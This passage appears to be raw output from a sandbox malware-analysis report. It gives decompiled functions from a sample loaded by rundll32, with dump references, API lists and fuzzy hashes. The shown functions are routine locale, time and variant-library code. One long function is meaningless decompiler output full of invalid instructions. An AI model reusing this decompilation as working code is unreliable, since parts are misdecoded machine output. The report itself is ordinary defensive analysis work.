                                            0x00185348
                                            0x00185355

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00185356), ref: 00185316
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 542ddb2c71f480962634d6471e5ef910313239e592cc84853697d6e5c36eb115
                                            • Instruction ID: d82e671aacb772c5fca3cf2537049ee9532c7943f52f90a7395d826741204beb
                                            • Opcode Fuzzy Hash: 542ddb2c71f480962634d6471e5ef910313239e592cc84853697d6e5c36eb115
                                            • Instruction Fuzzy Hash: 32F0C231E04609AFEB15FFA0CC42AEEB3BAFB85710F408875E51097180E7B42B04CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018954C, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0018954C(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E001839D4(_t10, _t18);
				}
				return E00183A70(_t10, _t5 - 1,  &_v260);
			}






                                            0x00189557
                                            0x00189559
                                            0x00189571
                                            0x00000000
                                            0x00189589
                                            0x00000000

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: daa0f04e3b6fc9fee6beaaab3731d9ef3a10f1e37d0f029353fce0ae8f944a0e
                                            • Instruction ID: 19c854ef76aad34629e501d1242227a5e2b2e490f1ec2df626c2e1c6cb826547
                                            • Opcode Fuzzy Hash: daa0f04e3b6fc9fee6beaaab3731d9ef3a10f1e37d0f029353fce0ae8f944a0e
                                            • Instruction Fuzzy Hash: B6E0D83170421417D315B5588C869F7B35C9768750F0442ABB94AD7341EFA0DF444BE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00189598, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00189598(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                            0x0018959b
                                            0x0018959c
                                            0x001895b2
                                            0x001895b9
                                            0x001895b4
                                            0x001895b4
                                            0x001895b4
                                            0x001895bf

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0018ACB2,00000000,0018AECB,?,?,00000000,00000000), ref: 001895AB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 33eb2210463a6f1f168751addeaa6af0f9de91085a939ca5f58f3c90521b225a
                                            • Instruction ID: ff70b8193f82784eeca78e4be1bc01ee9cbfba50ef89f53b9b9e6a5ba479737f
                                            • Opcode Fuzzy Hash: 33eb2210463a6f1f168751addeaa6af0f9de91085a939ca5f58f3c90521b225a
                                            • Instruction Fuzzy Hash: 8BD05E6630D2506AE315615A2D85DBB5BDCCBC57A1F14403AF549C6202D300CD079BB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018804C, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0018804C() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear;
			}




                                            0x00188050
                                            0x0018805c

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: LocalTime
                                            • String ID:
                                            • API String ID: 481472006-0
                                            • Opcode ID: 50d6a5481d7768f6b4a1c687c5b9d256e6741df9c770a815e9e82967501f0aed
                                            • Instruction ID: 11a93e35c2171e02a60ee79d2a5c300eb9d46f3badcb68ada5ac8717affc564d
                                            • Opcode Fuzzy Hash: 50d6a5481d7768f6b4a1c687c5b9d256e6741df9c770a815e9e82967501f0aed
                                            • Instruction Fuzzy Hash: 7BA0120C404C0141C24033180C0315531019910660FC4474068F8003D1EB19022046E7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018B4CE, Relevance: .4, Instructions: 368COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 66%
                                            			E0018B4CE(void* __eax, signed int __ebx, signed int* __ecx, signed char* __edx, void* __esi, void* __fp0) {
				signed char _t90;
				signed int _t93;
				signed char _t96;
				signed int _t97;
				signed char _t98;
				signed int _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char _t109;
				signed char _t111;
				void* _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed char _t118;
				signed char _t119;
				signed char _t120;
				void* _t124;
				signed char _t127;
				void* _t128;
				signed char _t129;
				signed int _t130;
				signed int _t137;
				signed char _t138;
				signed char _t186;
				signed char _t190;
				signed char _t194;
				signed char _t196;
				signed int _t201;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				intOrPtr _t221;
				intOrPtr _t222;
				intOrPtr _t223;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t226;
				intOrPtr _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				intOrPtr _t231;
				void* _t233;
				void* _t235;
				void* _t237;
				intOrPtr _t243;

				asm("sbb eax, 0x8000000");
				_t90 = __eax + __eax ^ 0x00000019;
				 *_t90 =  *_t90 + _t90;
				_t190 = __ebx ^  *__ecx ^  *__ecx;
				 *((intOrPtr*)(_t235 + __esi + 0x19)) =  *((intOrPtr*)(_t235 + __esi + 0x19)) + _t190;
				_t93 = _t90 + _t190 + __edx + __edx;
				 *_t93 =  *_t93 + __ecx;
				asm("sbb [eax], eax");
				asm("sbb al, 0x35");
				asm("sbb [eax], eax");
				asm("loopne 0x34");
				asm("sbb [eax], eax");
				asm("sbb [eax], eax");
				asm("sbb [eax], eax");
				_push(0xd0001934);
				_t194 = _t190 ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx;
				 *((intOrPtr*)(_t194 + __esi + 0x32c80019)) =  *((intOrPtr*)(_t194 + __esi + 0x32c80019)) + __ecx;
				asm("sbb [eax], eax");
				asm("invalid");
				_t96 = ((_t93 ^ 0x32e80019) & 0x00000034) + ((_t93 ^ 0x32e80019) & 0x00000034);
				 *((intOrPtr*)(_t96 - 0x47ffe6cc)) =  *((intOrPtr*)(_t96 - 0x47ffe6cc)) + __ecx;
				_t196 = _t194 ^  *__ecx ^  *__ecx;
				 *((intOrPtr*)(_t235 + __esi + 0x19)) =  *((intOrPtr*)(_t235 + __esi + 0x19)) + __ecx;
				 *((intOrPtr*)(_t96 + 0x54001932)) =  *((intOrPtr*)(_t96 + 0x54001932)) + __edx;
				_t97 = _t96 ^ 0x00000019;
				 *((intOrPtr*)(_t97 + 0x4c001932)) =  *((intOrPtr*)(_t97 + 0x4c001932)) + __ecx;
				_t98 = _t97 ^ 0x32a00019;
				asm("sbb [eax], eax");
				_t99 = _t98 ^ 0x00000019;
				 *((intOrPtr*)(_t99 + 0x7c001932)) =  *((intOrPtr*)(_t99 + 0x7c001932)) + _t196;
				_t100 = _t99 ^ 0x32900019;
				asm("sbb [eax], eax");
				asm("aam 0x34");
				asm("sbb [eax], eax");
				 *__edx = __edx;
				asm("sbb [eax], eax");
				 *(__ecx + _t196) =  *(__ecx + _t196) << 0;
				 *__edx =  *__edx ^ 0x00000019;
				 *((intOrPtr*)(_t233 + __esi + 0x32780019)) =  *((intOrPtr*)(_t233 + __esi + 0x32780019)) + _t100;
				asm("sbb [eax], eax");
				 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t100 + 0x34)) + _t100;
				asm("sbb [eax], eax");
				asm("sbb [eax], eax");
				_t102 = 0x50001932;
				_t103 = _t102 ^ 0x32580019;
				asm("sbb [eax], eax");
				asm("sbb [ecx+ebx], dh");
				 *((intOrPtr*)(_t103 + 0x32)) =  *((intOrPtr*)(_t103 + 0x32)) + __edx;
				asm("sbb [eax], eax");
				asm("hlt");
				 *((intOrPtr*)(_t103 + 0x32)) =  *((intOrPtr*)(_t103 + 0x32)) + __ecx;
				asm("sbb [eax], eax");
				 *((intOrPtr*)(__esi + 0x32380019)) =  *((intOrPtr*)(__esi + 0x32380019)) + _t103;
				asm("sbb [eax], eax");
				 *0x30001968 =  *((intOrPtr*)(0x30001968)) + __ecx;
				asm("sbb [eax], eax");
				 *__edx =  *__edx - __edx;
				asm("sbb [eax], eax");
				_t237 = 0x70001935;
				 *0x30001933 =  *0x30001933 + __ecx;
				 *0x30001933 =  *0x30001933 + 0x3000192a;
				 *0x30001933 =  *0x30001933 + 0x3000192a;
				_t201 = _t196 ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx;
				 *((intOrPtr*)(__esi + 0x19)) =  *((intOrPtr*)(__esi + 0x19)) + _t201;
				 *0x30001933 =  *0x30001933 + 0x3000192a;
				asm("sbb al, 0x32");
				asm("sbb [eax], eax");
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + 0x3000192a;
				 *0x30001933 =  *0x30001933 + 0x3000192a;
				asm("sbb [edx], dh");
				asm("sbb [eax], eax");
				asm("cld");
				 *0x30001933 =  *0x30001933 + 0x30001933;
				 *0x30001933 =  *0x30001933 + 0x30001933;
				__edx[__esi] =  &(__edx[__edx[__esi]]);
				asm("sbb [eax], eax");
				asm("les esi, [ebx]");
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + 0x30001933;
				 *0x30001933 =  *0x30001933 + 0x30001933;
				asm("adc [edx], dh");
				asm("sbb [eax], eax");
				 *((intOrPtr*)(__ecx + _t201)) =  *((intOrPtr*)(__ecx + _t201)) + __edx;
				 *0x30001933 =  *0x30001933 + 0x30001933;
				 *0x30001933 =  *0x30001933 + 0x30001933;
				__edx[__esi] = __ecx + __edx[__esi];
				asm("sbb [eax], eax");
				asm("clc");
				 *0x30001933 =  *0x30001933 + 0x30001933;
				 *0x30001933 =  *0x30001933 + 0x30001933;
				 *0x30001933 =  *0x30001933 + __ecx;
				 *0x30001933 =  *0x30001933 + 0x60003266;
				 *((intOrPtr*)(0x60003266)) =  *((intOrPtr*)(0x60003266)) + 0x60003266;
				__edx[__esi] = __edx[__esi] + 0x60003266;
				asm("sbb [eax], eax");
				_t108 = _t98;
				_t109 = _t108 ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t109;
				 *0x30001933 =  *0x30001933 + _t109;
				 *0x30001933 =  *0x30001933 + _t109;
				_t205 = _t201 ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx;
				_t111 =  &(__edx[_t109]) ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t111;
				 *0x30001933 =  *0x30001933 + _t111;
				 *__ecx =  *__ecx ^ _t205;
				_t113 = _t111 + _t205 + _t205;
				_t206 = _t205 ^  *__ecx;
				 *0x30001933 =  *0x30001933 + _t113;
				 *0x30001933 =  *0x30001933 + _t113;
				_t114 = _t113 + _t206;
				 *__ecx =  *__ecx ^ _t206;
				 *((intOrPtr*)(0x40001934 + __esi + 0x19)) =  *((intOrPtr*)(0x40001934 + __esi + 0x19)) + __edx;
				 *0x30001933 =  *0x30001933 + _t114;
				asm("hlt");
				 *__ecx =  *__ecx ^ _t206;
				 *0x30001933 =  *0x30001933 + _t206;
				_t115 = _t114 ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t115;
				asm("lock xor [ecx], ebx");
				 *0x30001933 =  *0x30001933 + __edx;
				_t116 = _t115 ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t116;
				asm("in al, dx");
				 *__ecx =  *__ecx ^ _t206;
				_t118 = _t116 + _t206 ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t118;
				 *0x30001933 =  *0x30001933 + _t118;
				_t119 = __ecx + _t118;
				 *__ecx =  *__ecx ^ _t206;
				 *0x30001967 =  *((intOrPtr*)(0x30001967)) + __ecx;
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + _t119;
				 *0x30001933 =  *0x30001933 + _t119;
				asm("in al, 0x31");
				asm("sbb [eax], eax");
				_t120 = _t119 ^ 0x00000034;
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + _t120;
				 *0x30001933 =  *0x30001933 + _t120;
				asm("loopne 0x33");
				asm("sbb [eax], eax");
				 *_t206 =  *_t206 << 0x19;
				 *0x30001933 =  *0x30001933 + _t120;
				 *0x30001933 =  *0x30001933 + _t120;
				 *__ecx =  *__ecx ^ _t206;
				 *((intOrPtr*)(__esi + 0x19)) =  *((intOrPtr*)(__esi + 0x19)) + __ecx;
				 *0x30001933 =  *0x30001933 + _t120 + _t206;
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + 0x3000192a;
				 *0x30001933 =  *0x30001933 + 0x3000192a;
				_t124 = 0x3000192a + __edx;
				 *__ecx =  *__ecx ^ _t206;
				 *((intOrPtr*)(0x40001934 + __esi)) =  *((intOrPtr*)(0x40001934 + __esi)) + __ecx;
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + _t124;
				 *0x30001933 =  *0x30001933 + _t124;
				 *__ecx =  *__ecx << 1;
				asm("sbb [eax], eax");
				 *((char*)(__ecx + _t206)) = __edx;
				 *0x30001933 =  *0x30001933 + _t124;
				 *0x30001933 =  *0x30001933 + _t124;
				 *__ecx =  *__ecx ^ _t206;
				_t127 = _t124 + __ecx + __ecx ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t127;
				 *0x30001933 =  *0x30001933 + _t127;
				_t128 = __ecx + _t127;
				 *__ecx =  *__ecx ^ _t206;
				 *0x30003267 =  *((intOrPtr*)(0x30003267)) + __edx;
				 *0x30001933 =  *0x30001933 + _t128;
				_t129 = _t128 + _t128;
				 *__ecx =  *__ecx ^ _t206;
				 *((intOrPtr*)(0x40001934 + __esi)) =  *((intOrPtr*)(_t237 + __esi)) + _t206;
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + _t129;
				 *0x30001933 =  *0x30001933 + _t129;
				 *__ecx =  *__ecx << 0x19;
				 *((intOrPtr*)(_t206 + __esi + 0x19)) =  *((intOrPtr*)(_t206 + __esi + 0x19)) + _t206;
				 *0x30001933 =  *0x30001933 + _t129;
				_t130 = _t129 ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t130;
				 *0x30001933 =  *0x30001933 + _t130;
				 *0x8C003264 =  *((intOrPtr*)(0x8c003264)) + _t206;
				 *0x30001933 =  *0x30001933 + (_t130 ^ 0x00000019);
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + 0x31;
				asm("sbb [eax], eax");
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + 0x34;
				 *0x30001933 =  *0x30001933 + 0x34;
				asm("lodsb");
				 *__ecx =  *__ecx ^ _t206;
				 *((intOrPtr*)(0x70001931 + __esi)) =  *((intOrPtr*)(0x70001931 + __esi)) + __edx;
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + 0x34;
				 *0x30001933 =  *0x30001933 + 0x34;
				asm("sbb [eax], eax");
				asm("enter 0x1933, 0x0");
				 *0x30001933 =  *0x30001933 + 0x34;
				 *0x30001933 =  *0x30001933 + 0x34;
				asm("movsb");
				 *__ecx =  *__ecx ^ _t206;
				 *0x30001933 =  *0x30001933 + __edx;
				 *0x30001933 =  *0x30001933 + 0x2d;
				_t137 =  *0x90001931 ^ 0x00000019;
				 *0x30001933 =  *0x30001933 + _t137;
				asm("pushfd");
				 *__ecx =  *__ecx ^ _t206;
				_t138 = _t137 + _t137;
				_t207 = _t206 ^  *__ecx;
				 *0x30001933 =  *0x30001933 + _t138;
				 *0x30001933 =  *0x30001933 + _t138;
				 *0xFFFFFFFFD8003264 =  *((intOrPtr*)(0xffffffffd8003264)) + _t207;
				_t208 = _t207 ^  *__ecx;
				 *0x30001933 =  *0x30001933 + _t138;
				 *0x30001933 =  *0x30001933 + _t138;
				 *((intOrPtr*)(__ecx + __esi + 0x35400019)) =  *((intOrPtr*)(__ecx + __esi + 0x35400019)) + __edx;
				asm("sbb [eax], eax");
				 *0x30001933 =  *0x30001933 + _t138;
				 *0x30001933 =  *0x30001933 + _t138;
				 *__ecx =  *__ecx ^ _t208;
				 *((intOrPtr*)(0x70001931 + __esi + 0x19)) =  *((intOrPtr*)(0x70001931 + __esi + 0x19)) + __ecx;
				 *0x30001933 =  *0x30001933 + _t138;
				asm("invalid");
				asm("sbb [eax], eax");
				if( *0x30001933 >= 0) {
					asm("sbb [eax], eax");
					 *0x30001933 =  *0x30001933 + _t138;
					 *0x30001933 =  *0x30001933 + _t138;
					_push(0x64001931);
					_t186 = _t138 ^ 0x00000019;
					 *0x30001933 =  *0x30001933 + _t186;
					 *0x30001933 =  *0x30001933 + _t186;
					 *((intOrPtr*)(__ecx + __esi + 0x19)) =  *((intOrPtr*)(__ecx + __esi + 0x19)) + _t186;
					 *((intOrPtr*)(0x70001931 + __esi)) =  *((intOrPtr*)(0x70001931 + __esi)) + _t208;
					asm("sbb [eax], eax");
					 *0x30001933 =  *0x30001933 + _t186;
					 *0x30001933 =  *0x30001933 + _t186;
					_push(_t233);
					_push(0x70001931);
					_push(0x18b915);
					_push( *[fs:eax]);
					 *[fs:eax] = 0x70001931;
					 *0x19478c =  *0x19478c + 1;
					_t243 =  *0x19478c;
				}
				if(_t243 == 0) {
					E0018B02C(E0018B4C0(0x194798));
					E0018A448();
					_t222 =  *0x189f20; // 0x189f24
					E00184258(0x19325c, 0x16, _t222);
					_t223 =  *0x189ea0; // 0x189ea4
					E00184258(0x193224, 7, _t223);
					_t224 =  *0x181000; // 0x181004
					E00184258(0x19313c, 2, _t224);
					E00183980(0x193134);
					_t225 =  *0x186590; // 0x186594
					E0018476C(0x194788, _t225);
					_t226 =  *0x18656c; // 0x186570
					E0018476C(0x194784, _t226);
					_t227 =  *0x181000; // 0x181004
					E00184258(0x19474c, 7, _t227);
					_t228 =  *0x181000; // 0x181004
					E00184258(0x194720, 7, _t228);
					_t229 =  *0x181000; // 0x181004
					E00184258(0x194704, 7, _t229);
					_t230 =  *0x181000; // 0x181004
					E00184258(0x1946d4, 0xc, _t230);
					_t231 =  *0x181000; // 0x181004
					E00184258(0x1946a4, 0xc, _t231);
					E00183980(0x1946a0);
					E00183980(0x19469c);
					E00183980(0x194698);
					E00183980(0x194694);
					E00183980(0x19468c);
					E00183980(0x194688);
					E00183980(0x19467c);
					E00183980(0x1930dc);
					E00183F80(0x1930c8);
					E00183980(0x1930c4);
				}
				_pop(_t221);
				 *[fs:eax] = _t221;
				_push(E0018B91C);
				return 0;
			}





















































                                            0x0018b4d0
                                            0x0018b4d9
                                            0x0018b4db
                                            0x0018b4dd
                                            0x0018b4df
                                            0x0018b4eb
                                            0x0018b4ef
                                            0x0018b4f6
                                            0x0018b4f8
                                            0x0018b4fa
                                            0x0018b4fc
                                            0x0018b4fe
                                            0x0018b502
                                            0x0018b506
                                            0x0018b508
                                            0x0018b50d
                                            0x0018b50f
                                            0x0018b516
                                            0x0018b518
                                            0x0018b51b
                                            0x0018b51f
                                            0x0018b525
                                            0x0018b527
                                            0x0018b52b
                                            0x0018b531
                                            0x0018b533
                                            0x0018b539
                                            0x0018b53e
                                            0x0018b541
                                            0x0018b543
                                            0x0018b549
                                            0x0018b54e
                                            0x0018b550
                                            0x0018b552
                                            0x0018b554
                                            0x0018b556
                                            0x0018b558
                                            0x0018b55c
                                            0x0018b55f
                                            0x0018b566
                                            0x0018b56f
                                            0x0018b572
                                            0x0018b57e
                                            0x0018b580
                                            0x0018b581
                                            0x0018b586
                                            0x0018b588
                                            0x0018b58b
                                            0x0018b58e
                                            0x0018b590
                                            0x0018b593
                                            0x0018b596
                                            0x0018b59f
                                            0x0018b5a6
                                            0x0018b5af
                                            0x0018b5b2
                                            0x0018b5b4
                                            0x0018b5b6
                                            0x0018b5b8
                                            0x0018b5bb
                                            0x0018b5bd
                                            0x0018b5bf
                                            0x0018b5c1
                                            0x0018b5c3
                                            0x0018b5ca
                                            0x0018b5cc
                                            0x0018b5ce
                                            0x0018b5d2
                                            0x0018b5d4
                                            0x0018b5d6
                                            0x0018b5d8
                                            0x0018b5da
                                            0x0018b5dc
                                            0x0018b5df
                                            0x0018b5e1
                                            0x0018b5e3
                                            0x0018b5e6
                                            0x0018b5e8
                                            0x0018b5ea
                                            0x0018b5ec
                                            0x0018b5ee
                                            0x0018b5f0
                                            0x0018b5f2
                                            0x0018b5f4
                                            0x0018b5f7
                                            0x0018b5f9
                                            0x0018b5fb
                                            0x0018b5fe
                                            0x0018b600
                                            0x0018b603
                                            0x0018b605
                                            0x0018b607
                                            0x0018b60f
                                            0x0018b611
                                            0x0018b613
                                            0x0018b616
                                            0x0018b618
                                            0x0018b619
                                            0x0018b61b
                                            0x0018b61d
                                            0x0018b61f
                                            0x0018b621
                                            0x0018b625
                                            0x0018b627
                                            0x0018b629
                                            0x0018b62d
                                            0x0018b62f
                                            0x0018b631
                                            0x0018b633
                                            0x0018b635
                                            0x0018b637
                                            0x0018b639
                                            0x0018b63b
                                            0x0018b642
                                            0x0018b644
                                            0x0018b645
                                            0x0018b647
                                            0x0018b649
                                            0x0018b64e
                                            0x0018b650
                                            0x0018b653
                                            0x0018b655
                                            0x0018b65a
                                            0x0018b65c
                                            0x0018b65d
                                            0x0018b661
                                            0x0018b663
                                            0x0018b665
                                            0x0018b667
                                            0x0018b669
                                            0x0018b66b
                                            0x0018b66e
                                            0x0018b670
                                            0x0018b672
                                            0x0018b674
                                            0x0018b676
                                            0x0018b678
                                            0x0018b67a
                                            0x0018b67c
                                            0x0018b67e
                                            0x0018b680
                                            0x0018b682
                                            0x0018b684
                                            0x0018b687
                                            0x0018b689
                                            0x0018b68d
                                            0x0018b68f
                                            0x0018b696
                                            0x0018b69a
                                            0x0018b69f
                                            0x0018b6a1
                                            0x0018b6a3
                                            0x0018b6a5
                                            0x0018b6a7
                                            0x0018b6aa
                                            0x0018b6ac
                                            0x0018b6ae
                                            0x0018b6b0
                                            0x0018b6b2
                                            0x0018b6b4
                                            0x0018b6b7
                                            0x0018b6b9
                                            0x0018b6bd
                                            0x0018b6c1
                                            0x0018b6c3
                                            0x0018b6c5
                                            0x0018b6c7
                                            0x0018b6c9
                                            0x0018b6cb
                                            0x0018b6d1
                                            0x0018b6d3
                                            0x0018b6d5
                                            0x0018b6d7
                                            0x0018b6da
                                            0x0018b6dc
                                            0x0018b6de
                                            0x0018b6e0
                                            0x0018b6e3
                                            0x0018b6ea
                                            0x0018b6f1
                                            0x0018b6f3
                                            0x0018b6f5
                                            0x0018b6f7
                                            0x0018b702
                                            0x0018b706
                                            0x0018b70e
                                            0x0018b712
                                            0x0018b716
                                            0x0018b718
                                            0x0018b71a
                                            0x0018b71c
                                            0x0018b71d
                                            0x0018b71f
                                            0x0018b722
                                            0x0018b724
                                            0x0018b726
                                            0x0018b72a
                                            0x0018b72c
                                            0x0018b730
                                            0x0018b732
                                            0x0018b734
                                            0x0018b735
                                            0x0018b737
                                            0x0018b73e
                                            0x0018b745
                                            0x0018b74a
                                            0x0018b74c
                                            0x0018b74d
                                            0x0018b74f
                                            0x0018b751
                                            0x0018b753
                                            0x0018b755
                                            0x0018b757
                                            0x0018b75d
                                            0x0018b75f
                                            0x0018b761
                                            0x0018b763
                                            0x0018b76a
                                            0x0018b76c
                                            0x0018b76e
                                            0x0018b771
                                            0x0018b773
                                            0x0018b77a
                                            0x0018b77c
                                            0x0018b77e
                                            0x0018b780
                                            0x0018b782
                                            0x0018b784
                                            0x0018b786
                                            0x0018b788
                                            0x0018b78d
                                            0x0018b78f
                                            0x0018b791
                                            0x0018b793
                                            0x0018b797
                                            0x0018b79a
                                            0x0018b79c
                                            0x0018b79e
                                            0x0018b7a0
                                            0x0018b7a5
                                            0x0018b7a6
                                            0x0018b7ab
                                            0x0018b7ae
                                            0x0018b7b1
                                            0x0018b7b1
                                            0x0018b7b1
                                            0x0018b7b7
                                            0x0018b7c7
                                            0x0018b7cc
                                            0x0018b7db
                                            0x0018b7e1
                                            0x0018b7f0
                                            0x0018b7f6
                                            0x0018b805
                                            0x0018b80b
                                            0x0018b815
                                            0x0018b81f
                                            0x0018b825
                                            0x0018b82f
                                            0x0018b835
                                            0x0018b844
                                            0x0018b84a
                                            0x0018b859
                                            0x0018b85f
                                            0x0018b86e
                                            0x0018b874
                                            0x0018b883
                                            0x0018b889
                                            0x0018b898
                                            0x0018b89e
                                            0x0018b8a8
                                            0x0018b8b2
                                            0x0018b8bc
                                            0x0018b8c6
                                            0x0018b8d0
                                            0x0018b8da
                                            0x0018b8e4
                                            0x0018b8ee
                                            0x0018b8f8
                                            0x0018b902
                                            0x0018b902
                                            0x0018b909
                                            0x0018b90c
                                            0x0018b90f
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeString
                                            • String ID:
                                            • API String ID: 3341692771-0
                                            • Opcode ID: f135dd20bcdab72b8e6185ea21071d3d8e35c6a883942a7dc935659ac2a00788
                                            • Instruction ID: b177fb8021567027777fccf4fbe6d1168709cd7c4358a5f939df9dadbe845265
                                            • Opcode Fuzzy Hash: f135dd20bcdab72b8e6185ea21071d3d8e35c6a883942a7dc935659ac2a00788
                                            • Instruction Fuzzy Hash: E8E1037654E3C08FD7435B7488615863FB0EF53608B5B04EBD490CF1B3E66A5A0ADB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018BE88, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0018BE88() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x1947a0 = E0018BE5C("VariantChangeTypeEx", E0018B9F8, _t91);
				 *0x1947a4 = E0018BE5C("VarNeg", E0018BA28, _t91);
				 *0x1947a8 = E0018BE5C("VarNot", E0018BA28, _t91);
				 *0x1947ac = E0018BE5C("VarAdd", E0018BA34, _t91);
				 *0x1947b0 = E0018BE5C("VarSub", E0018BA34, _t91);
				 *0x1947b4 = E0018BE5C("VarMul", E0018BA34, _t91);
				 *0x1947b8 = E0018BE5C("VarDiv", E0018BA34, _t91);
				 *0x1947bc = E0018BE5C("VarIdiv", E0018BA34, _t91);
				 *0x1947c0 = E0018BE5C("VarMod", E0018BA34, _t91);
				 *0x1947c4 = E0018BE5C("VarAnd", E0018BA34, _t91);
				 *0x1947c8 = E0018BE5C("VarOr", E0018BA34, _t91);
				 *0x1947cc = E0018BE5C("VarXor", E0018BA34, _t91);
				 *0x1947d0 = E0018BE5C("VarCmp", E0018BA40, _t91);
				 *0x1947d4 = E0018BE5C("VarI4FromStr", E0018BA4C, _t91);
				 *0x1947d8 = E0018BE5C("VarR4FromStr", E0018BAB8, _t91);
